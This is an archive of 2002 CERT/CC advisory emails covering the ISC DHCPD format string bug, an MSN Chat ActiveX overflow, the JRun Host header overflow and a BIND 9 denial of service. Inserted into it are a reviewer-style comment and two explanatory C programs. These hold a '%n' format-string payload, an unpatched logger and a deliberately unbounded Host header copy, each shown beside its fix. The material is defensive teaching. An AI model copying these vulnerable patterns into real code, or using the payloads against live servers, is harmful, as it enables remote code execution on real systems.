A patch is included below, and we have a patched version of 3.0 available (3.0pl1) and a new release candidate for the next bug-fix release (3.0.1RC9). Both of these new releases are not vulnerable.

--- common/print.c Tue Apr 9 13:41:17 2002 +++ common/print.c.patched Tue Apr 9 13:41:56 2002
@@ -1366,8 +1366,8 @@ *s++ = '.'; *s++ = 0; if (errorp) - log_error (obuf); + log_error ("%s",obuf); else - log_info (obuf); + log_info ("%s",obuf); } #endif /* NSUPDATE */

Lotus Development Corporation

This issue does not affect Lotus products.

Microsoft Corporation

Microsoft does not ship the ISC DHCPD program.

NetBSD

NetBSD fixed this during a format string sweep performed on 11-Oct-2000. No released version of NetBSD is vulnerable to this issue.

Silicon Graphics, Inc.

SGI is not vulnerable.
_________________________________________________________________
The CERT Coordination Center acknowledges Next Generation Security Technologies as the discoverer of this vulnerability and thanks them and the Internet Software Consortium (ISC) for their cooperation, reporting, and analysis of this vulnerability.
_________________________________________________________________
Feedback can be directed to the author: Ian A. Finlay
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-2002-12.html
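Review bot: the two changed calls in this hunk (log_error and log_info in the NSUPDATE block of common/print.c at line 1366) are the right fix, since obuf, which carries the host name returned in the DNS acknowledgement, is now passed as the "%s" argument rather than as the format string, but the hunk touches only that one location; the same log_error (buf) / log_info (buf) shape should be searched for across the rest of the server and corrected the same way, which is what NetBSD's statement calls a format string sweep. Building with -Wformat -Wformat-security flags every remaining call whose format is not a string literal and has no arguments, so the sweep can be checked mechanically rather than by eye.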
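The rpc.rwalld error-message path described in CA-2002-10 and the dhcpd transaction-logging path fixed in the hunk above are the same bug class: a string that an attacker influences is handed to a printf-style logger as its format string. The C program below is an added illustration, not code from ISC, Sun or CERT/CC. It puts the unpatched call shape (log_error (obuf)) next to the patched one (log_error ("%s", obuf)) and adds a scanner that tells whether a message would be interpreted as a format string at all, which is the check a logger can apply to its inputs or an auditor to a code base. The message wording, the host names and the helper build_update_message are constructed for the example and stand in for whatever produced obuf in the real daemon.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if msg, used as a printf format, would contain at least one
 * conversion directive: a '%' not immediately followed by another '%'.
 * "%%" is an escaped percent sign and is harmless. */
int has_format_directive(const char *msg)
{
    for (const char *p = msg; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%": literal percent, skip both */
            p++;
            continue;
        }
        return 1;               /* "%n", "%x", "%s", a trailing '%' ... */
    }
    return 0;
}

/* Pre-patch shape, log_error (obuf): the message is the format string, so an
 * attacker-chosen "%x" reads the caller's stack slots and "%n" writes through
 * them. Behaviour is only defined when msg contains no '%' at all. */
void log_update_unpatched(char *out, size_t n, const char *msg)
{
    snprintf(out, n, msg);      /* compilers warn: format is not a literal */
}

/* Post-patch shape, log_error ("%s", obuf): the message is an argument and
 * is copied verbatim whatever characters it contains. */
void log_update_patched(char *out, size_t n, const char *msg)
{
    snprintf(out, n, "%s", msg);
}

/* Hypothetical stand-in for the code that filled obuf: the host name came
 * from the DHCP client and back through the DNS server's acknowledgement,
 * so it is attacker-influenced. The wording is made up for this example. */
void build_update_message(char *obuf, size_t n, const char *hostname,
                          const char *result)
{
    snprintf(obuf, n, "dns update for %s: %s", hostname, result);
}

/* Does the patched logger reproduce the message for this host name exactly? */
int patched_logs_verbatim(const char *hostname)
{
    char obuf[256], line[256];
    build_update_message(obuf, sizeof obuf, hostname, "success");
    log_update_patched(line, sizeof line, obuf);
    return strcmp(line, obuf) == 0;
}

int main(void)
{
    /* Constructed hostile host name, as a DHCP client could register it. */
    const char *hostile = "victim.%n%n%n%n.example";
    char obuf[256], line[256];

    build_update_message(obuf, sizeof obuf, hostile, "success");
    printf("directives present: %d\n", has_format_directive(obuf));

    log_update_patched(line, sizeof line, obuf);
    printf("patched logger:   %s\n", line);

    /* The unpatched path is shown only with a '%'-free message; feeding it
     * the hostile obuf above is exactly the rpc.rwalld / dhcpd bug. */
    build_update_message(obuf, sizeof obuf, "client.example", "success");
    log_update_unpatched(line, sizeof line, obuf);
    printf("unpatched logger: %s\n", line);
    return 0;
}
```

The patched logger prints the "%n" sequences as four literal characters each, which is the whole fix: the data never reaches the format parser. has_format_directive is deliberately strict, treating a lone trailing '%' as a directive too, because printf's behaviour on an incomplete specification is likewise undefined.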
Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. 
Revision History May 8, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPNle2qCVPMXQI2HJAQEJ5gP/SKXwgQG1Z4Y+dQmAqGnHxYEZuKaPDuLB zLmkVcPQrpdo8DVDNpy3uMK1Mfro3RFLMg5mTON4noHiiIQb5M7iZPWXV5qnQNt3 s4ga8RseymwUvbNbdBo6x9EdjrM2+iQSrJHbVF0RXRvZT9zRAg+sfzHtGwEeHxQ3 XuLLU2DySLc= =Kvhw -----END PGP SIGNATURE----- From - Fri May 10 16:11:02 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g4AN1lk16488; Fri, 10 May 2002 16:01:48 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA03628; Fri, 10 May 2002 16:38:05 -0400 (EDT) Date: Fri, 10 May 2002 16:38:05 -0400 (EDT) Received: by canaveral.red.cert.org; Fri, 10 May 2002 16:31:39 -0400 Message-Id: 
From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-13 Buffer Overflow in Microsoft's MSN Chat ActiveX X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 252 Status: RO X-Status: X-Keywords: X-UID: 48 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-13 Buffer Overflow in Microsoft's MSN Chat ActiveX Control Original release date: May 10, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Microsoft Windows systems with one or more of the following: * Microsoft MSN Chat control * Microsoft MSN Messenger 4.6 and prior * Microsoft Exchange Instant Messenger 4.6 and prior Overview Microsoft's MSN Chat is an ActiveX control for Microsoft Messenger, an instant messaging client. A buffer overflow exists in the ActiveX control that may permit a remote attacker to execute arbitrary code on the system with the privileges of the current user. I. Description A buffer overflow exists in the "ResDLL" parameter of the MSN Chat ActiveX control that may permit a remote attacker to execute arbitrary code on the system with the privileges of the current user. This vulnerability affects MSN Messenger and Exchange Instant Messenger users. Since the control is signed by Microsoft, users of Microsoft's Internet Explorer (IE) who accept and install Microsoft-signed ActiveX controls are also affected. The Microsoft MSN Chat control is also available for direct download from the web. The <OBJECT> tag could be used to embed the ActiveX control in a web page. If an attacker can trick the user into visiting a malicious site, or sends the victim a web page as an HTML-formatted email or newsgroup posting, then this vulnerability could be exploited. 
This acceptance and installation of the control can occur automatically within IE for users who trust Microsoft-signed ActiveX controls. When the web page is rendered, either by opening the page or viewing the page through a preview pane, the ActiveX control could be invoked. Likewise, if the ActiveX control is embedded in a Microsoft Office (Word, Excel, etc.) document, it may be executed when the document is opened. According to the Microsoft Advisory (MS02-022): It's important to note that this control is used for chat rooms on several MSN sites in addition to the main MSN Chat site. If you have successfully used chat on any MSN-site, you have downloaded and installed the chat control. The CERT/CC has published information on ActiveX in Results of the Security in ActiveX Workshop (pdf) and CA-2000-07. This issue is also being referenced as CAN-2002-0155: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0155 II. Impact A remote attacker may be able to execute arbitrary code with the privileges of the current user. III. Solution Apply a patch from your vendor Microsoft has released a patch, a fixed MSN Chat control, and upgrades to address this issue. It is important that all users apply the patch since it will prevent the installation of the vulnerable control on systems that have not already installed it. 
Download location for the patch: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=38790 Download location for updated version of MSN Messenger with the corrected control: http://messenger.msn.com/download/download.asp?client=1&update=1 Download location for updated version of Exchange Instant Messenger with the corrected control: http://www.microsoft.com/Exchange/downloads/2000/IMclient.asp Microsoft also notes that Outlook 98 and Outlook 2000 with the Outlook Email Security Update, Outlook 2002, and Outlook Express will block exploitation of this vulnerability via email, because these products open HTML email in the Restricted Sites zone. Other mitigation strategies include opening web pages and email messages in the Restricted Sites zone and using email clients that permit users to view messages in plain text. Likewise, it is important for users to realize that a signed control only authenticates the origin of the control and says nothing about the security of the control. Therefore, downloading and installing signed controls through an automated process is not a secure choice. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, please check the Vulnerability Note (VU#713779) or contact your vendor directly. Microsoft See http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-022.asp _________________________________________________________________ The CERT/CC acknowledges the eEye Team for discovering and reporting on this vulnerability and thanks Microsoft for their technical assistance. _________________________________________________________________ Feedback can be directed to the author: Jason A. 
Rafail ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-13.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. 
_________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History May 10, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPNws56CVPMXQI2HJAQGUUQP/ZsyoPxzyttkDCaqvD8V7fu/dWWyUFPrk qYTu2CUfZtuGdmpZ91sR8jWn3BAgEiIiF5sIXMckqjApNDORkLdt1sIo5ddkX4qR k1JO0sAiNITtUAXwx3vsv36EYCtL+JaX5jmMrZffZvxjM1PzbmxGD7NVOvtGQtGB MUEDOZLJe44= =TqFl -----END PGP SIGNATURE----- From - Tue May 28 13:23:01 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g4SJnaSQ012500; Tue, 28 May 2002 12:49:36 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA23434; Tue, 28 May 2002 14:51:37 -0400 (EDT) Date: Tue, 28 May 2002 14:51:36 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 28 May 2002 14:46:04 -0400 Message-Id: 
From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2002-02 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 295 Status: RO X-Status: X-Keywords: X-UID: 49 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2002-02 May 28, 2002 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available at http://www.cert.org/summaries/. ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in February 2002 (CS-2002-01), we have released several advisories addressing vulnerabilities in Microsoft's IIS server, Oracle Database and Application Servers, Sun Solaris cachefsd, and MSN Instant Messenger. In addition, we have published statistics for the first quarter of 2002, numerous white papers, and a collection of frequently asked questions about the OCTAVE Method. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. 1. Exploitation of Vulnerabilities in Microsoft SQL Server The CERT/CC has received reports of systems being compromised through the automated exploitation of null or weak default sa passwords in Microsoft SQL Server and Microsoft Data Engine. 
This activity is accompanied by high volumes of scanning, and appears to be related to recently discovered self-propagating malicious code, referred to by various sources as Spida, SQLsnake, and Digispid. CERT Incident Note IN-2002-04: Exploitation of Vulnerabilities in Microsoft SQL Server http://www.cert.org/incident_notes/IN-2002-04.html 2. Buffer Overflow in Microsoft's MSN Chat ActiveX Control Microsoft's MSN Chat is an ActiveX control for Microsoft Messenger, an instant messaging client. A buffer overflow exists in the ActiveX control that may permit a remote attacker to execute arbitrary code on the system with the privileges of the current user. CERT Advisory CA-2002-13: Buffer Overflow in Microsoft's MSN Chat ActiveX Control http://www.cert.org/advisories/CA-2002-13.html 3. Format String Vulnerability in ISC DHCPD The Internet Software Consortium (ISC) provides a Dynamic Host Configuration Protocol Daemon (DHCPD), which is a server that is used to allocate network addresses and assign configuration parameters to hosts. A format string vulnerability may permit a remote attacker to execute code with the privileges of the DHCPD (typically root). We have not seen active scanning or exploitation of this vulnerability. CERT Advisory CA-2002-12: Format String Vulnerability in ISC DHCPD http://www.cert.org/advisories/CA-2002-12.html 4. Heap Overflow in Cachefs Daemon (cachefsd) Sun's NFS/RPC file system cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remotely exploitable vulnerability exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root. The CERT/CC has received credible reports of scanning and exploitation of Solaris systems running cachefsd. CERT Advisory CA-2002-11: Heap Overflow in Cachefs Daemon (cachefsd) http://www.cert.org/advisories/CA-2002-11.html 5. 
Multiple Vulnerabilities in Microsoft IIS A variety of vulnerabilities exist in various versions of Microsoft IIS. Some of these vulnerabilities may allow an intruder to execute arbitrary code on vulnerable systems. CERT Advisory CA-2002-09: Multiple Vulnerabilities in Microsoft IIS http://www.cert.org/advisories/CA-2002-09.html 6. Multiple Vulnerabilities in Oracle Servers Multiple vulnerabilities in Oracle Application Server and Oracle Database have recently been discovered. These vulnerabilities include buffer overflows, insecure default settings, failures to enforce access controls, and failure to validate input. The impacts of these vulnerabilities include the execution of arbitrary commands or code, denial of service, and unauthorized access to sensitive information. CERT Advisory CA-2002-08: Multiple Vulnerabilities in Oracle Servers http://www.cert.org/advisories/CA-2002-08.html 7. Social Engineering Attacks via IRC and Instant Messaging The CERT/CC has received reports of social engineering attacks on users of Internet Relay Chat (IRC) and Instant Messaging (IM) services. Intruders trick unsuspecting users into downloading and executing malicious software, which allows the intruders to use the systems as attack platforms for launching distributed denial-of-service (DDoS) attacks. The reports to the CERT/CC indicate that tens of thousands of systems have recently been compromised in this manner. 
CERT Incident Note IN-2002-03: Social Engineering Attacks via IRC and Instant Messaging http://www.cert.org/incident_notes/IN-2002-03.html ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new or updated * Advisories * Incident Notes * CERT/CC Statistics * OCTAVE^SM Method Frequently Asked Questions * White Papers + Foundations for Survivable Systems Engineering + Organized Crime and Cyber-Crime: Implications for Business + Overview of Attack Trends + Using PGP to Verify Digital Signatures + Downstream Liability for Attack Relay Amplification + Cross-Site Scripting Vulnerabilities + Countering Cyber War ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2002-02.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. 
______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright ©2002 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPPPOk6CVPMXQI2HJAQHHeAQAxlNggZhs00dAQBX4Wvm1xIeBMyK6NYLn HQyiHIhHFoeshf+FsF1aBbwV1m07nkv9OnEWm4I2fqOPtPRNQJAAhud7XrfEpeOm EqEkHQD9LaoQux/HVe23Gmp/Lv5RkLbUu72tL18KdI7YVnteRKvtxIWvCgFfvjRM 2YTPonaOjlQ= =XKwE -----END PGP SIGNATURE----- From - Wed May 29 18:18:19 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g4U1GhdD006828; Wed, 29 May 2002 18:16:43 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id SAA29922; Wed, 29 May 2002 18:35:12 -0400 (EDT) Date: Wed, 29 May 2002 18:35:12 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 29 May 2002 18:29:28 -0400 Message-Id: 
From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-14 Buffer overflow in Macromedia JRun X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 300 Status: RO X-Status: X-Keywords: X-UID: 50 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-14 Buffer overflow in Macromedia JRun Original release date: May 29, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Windows NT4 or Windows 2000 running IIS versions 4 or 5 and Macromedia JRun 3.0 or 3.1 Overview A remotely exploitable buffer overflow exists in Macromedia's JRun 3.0 and 3.1. I. Description JRun is an application server that works with most popular web servers, such as Apache and Internet Information Server (IIS). According to Macromedia, JRun is deployed at over 10,000 organizations worldwide. As reported in the Next Generation Security Software Advisory (#NISR29052002), a remotely exploitable buffer overflow exists in the ISAPI filter/application. Specifically, the buffer overflow exists in the portion of code that handles the host header field. If an attacker sends a specially crafted request to the application server, he can overwrite a return address on the stack. Because the vulnerable DLL is running in the address space of the web server process, code submitted by the attacker will be run with SYSTEM privileges. II. Impact A remote attacker can execute arbitrary code on the vulnerable target with SYSTEM privileges. III. Solution Apply a patch from Macromedia or upgrade to JRun 4. The patch is available from: http://www.macromedia.com/v1/Handlers/index.cfm?ID=22273&Method=Full#download JRun 4 is available at: http://www.macromedia.com/software/jrun/ Appendix A. 
- Vendor Information This appendix contains information provided by vendors for this advisory. Additional information can be found in VU#703835. Macromedia Inc. Macromedia has confirmed that this is a problem in older versions of JRun 3.0 and 3.1 and is soon to publish a security bulletin regarding this. Visit the Macromedia security zone site at http://www.macromedia.com/security for more information. _________________________________________________________________ This vulnerability was discovered by David Litchfield of Next Generation Security Software. _________________________________________________________________ Author: Ian A. Finlay ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-14.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. 
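The description above gives the bug shape but not the code: a Host header value copied into a fixed stack buffer inside the ISAPI filter with no length check, so an oversized value overwrites the saved return address in the web server process. As an added example, not Macromedia's, NGSS's or the JRun filter's own code, the program below shows that shape beside a bounded version that refuses oversized values before any copy. HOST_MAX, the function names and the request strings are constructed for illustration.

```c
/* Added example, not Macromedia's or NGSS's code: the bug shape given in
 * CA-2002-14, a Host header value copied into a fixed stack buffer with
 * no length check, beside a bounded version. HOST_MAX, the function
 * names and the request strings are constructed for illustration. */
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define HOST_MAX 64          /* hypothetical size of the filter's buffer */

/* Locate the Host header in a raw HTTP request. On success *val points
 * at the first byte of the value and its length is returned; -1 means
 * no Host header appears before the blank line that ends the headers. */
int find_host(const char *req, const char **val)
{
    const char *line = req;
    while (line && *line) {
        const char *eol = strstr(line, "\r\n");
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        if (len == 0)
            break;                                /* end of header block */
        if (len > 5 && strncasecmp(line, "Host:", 5) == 0) {
            const char *v = line + 5;
            size_t n = len - 5;
            while (n && (*v == ' ' || *v == '\t')) { v++; n--; }
            *val = v;
            return (int)n;
        }
        line = eol ? eol + 2 : NULL;
    }
    return -1;
}

/* Vulnerable shape: n is never compared with HOST_MAX, so a Host value
 * of HOST_MAX bytes or more runs off the end of `host` into the saved
 * frame and return address. Kept for contrast only; never call it on
 * untrusted input. */
int host_unsafe(const char *req)
{
    char host[HOST_MAX];
    const char *v;
    int n = find_host(req, &v);
    if (n < 0)
        return -1;
    memcpy(host, v, (size_t)n);                   /* unbounded copy */
    host[n] = '\0';
    return (int)strlen(host);
}

/* Hardened: check the length against the destination before any copy.
 * Returns the value length, -1 if absent, -2 if it would not fit. */
int host_safe(const char *req, char *out, size_t outlen)
{
    const char *v;
    int n = find_host(req, &v);
    if (n < 0)
        return -1;
    if ((size_t)n >= outlen)
        return -2;                                /* reject; do not truncate silently */
    memcpy(out, v, (size_t)n);
    out[n] = '\0';
    return n;
}

/* What a filter gate would do: accept or refuse the request up front. */
int host_check(const char *req)
{
    char buf[HOST_MAX];
    return host_safe(req, buf, sizeof buf);
}

/* Constructed requests for demonstration. */
const char *make_request(const char *host)
{
    static char req[512];
    snprintf(req, sizeof req, "GET /index.jsp HTTP/1.0\r\nHost: %s\r\n\r\n", host);
    return req;
}

const char *make_padded_request(size_t n)        /* Host value of n 'A' bytes */
{
    static char req[1024];
    size_t p = (size_t)snprintf(req, sizeof req, "GET /index.jsp HTTP/1.0\r\nHost: ");
    if (n > sizeof req - p - 5)
        n = sizeof req - p - 5;
    memset(req + p, 'A', n);
    memcpy(req + p + n, "\r\n\r\n", 5);           /* includes the terminating NUL */
    return req;
}

int main(void)
{
    printf("normal host: %d\n", host_check(make_request("app.example.com")));   /* 15 */
    printf("300-byte host: %d\n", host_check(make_padded_request(300)));        /* -2 */
    return 0;
}
```

The hardened version returns a distinct code for "too long" rather than truncating, so a caller can log and drop the request; silent truncation would hide exactly the probes an operator wants to see while the patch is being rolled out.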
______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History May 29, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPPVQSqCVPMXQI2HJAQGVHgP/U5zIg4973uYvBmeM4X06vfkHbRFG7YM8 nwnnqneHG/xPkytz3LpjfbbBtmdXWJmfJK64J/R9vGu84Cbp3NR2MvDPQ6J3c+7+ v6/uaemXWZZdbpxtLTULWqCsy+Fkp6XpOekvImEek1A9jKxVnH2lB42OwW28pmap RYbu1k04txk= =RYRj -----END PGP SIGNATURE----- From - Tue Jun 4 14:48:27 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g54LfpTu012928; Tue, 4 Jun 2002 14:41:52 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA24905; Tue, 4 Jun 2002 16:44:55 -0400 (EDT) Date: Tue, 4 Jun 2002 16:44:55 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 4 Jun 2002 16:39:22 -0400 Message-Id: 
From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-15 Denial-of-Service Vulnerability in ISC BIND 9 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 322 Status: RO X-Status: X-Keywords: X-UID: 51 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-15 Denial-of-Service Vulnerability in ISC BIND 9 Original release date: June 04, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Domain Name System (DNS) servers running ISC BIND 9 prior to 9.2.1 Because the normal operation of most services on the Internet depends on the proper operation of DNS servers, other services could be affected if this vulnerability is exploited. Overview A denial-of-service vulnerability exists in version 9 of the Internet Software Consortium's (ISC) Berkeley Internet Name Domain (BIND) server. ISC BIND versions 8 and 4 are not affected. Exploiting this vulnerability will cause the BIND server to shut down. I. Description BIND is an implementation of the Domain Name System (DNS) that is maintained by the ISC. A vulnerability exists in version 9 of BIND that allows remote attackers to shut down BIND servers. An attacker can cause the shutdown by sending a specific DNS packet designed to trigger an internal consistency check. However, this vulnerability will not allow an attacker to execute arbitrary code or write data to arbitrary locations in memory. The internal consistency check that triggers the shutdown occurs when the rdataset parameter to the dns_message_findtype() function in message.c is not NULL as expected. The condition causes the code to assert an error message and call abort() to shut down the BIND server. 
It is also possible to accidentally trigger this vulnerability using common queries found in routine operation, especially queries originating from SMTP servers. A vulnerability note describing this problem can be found at http://www.kb.cert.org/vuls/id/739123. This vulnerability note includes a list of vendors that have been contacted about this vulnerability. This vulnerability is also being referenced as CAN-2002-0400: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0400 II. Impact Exploitation of this vulnerability will cause the BIND server to abort and shut down. As a result, the BIND server will not be available unless it is restarted. III. Solution Apply a patch from your vendor The ISC has released BIND version 9.2.1. The CERT/CC recommends that users of BIND 9 apply a patch from their vendor or upgrade to BIND 9.2.1. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple The version of BIND that ships in Mac OS X and Mac OS X Server does not contain this vulnerability. BSDI Wind River Systems, Inc. does not include BIND 9 with any version of BSD/OS. Caldera SCO OpenServer from Caldera does not ship BIND9, and is therefore not vulnerable. Caldera Open UNIX does ship BIND9, and is vulnerable. We are investigating. Caldera OpenLinux does not ship BIND9, and is therefore not vulnerable. Compaq Computer Corporation HP Alpha Server Products: HP Tru64 UNIX: Tru64 UNIX is not vulnerable to this reported problem. HP Tru64 UNIX ships with BIND 8.2.2-p5. TCP/IP for HP OpenVms: TCP/IP for HP OpenVms is not vulnerable to this reported problem. The current versions of TCP/IP for HP OpenVMS ship BIND 8.2.2-p5. HP NonStop Server: "HP NonStop Himalaya is not vulnerable to this problem. 
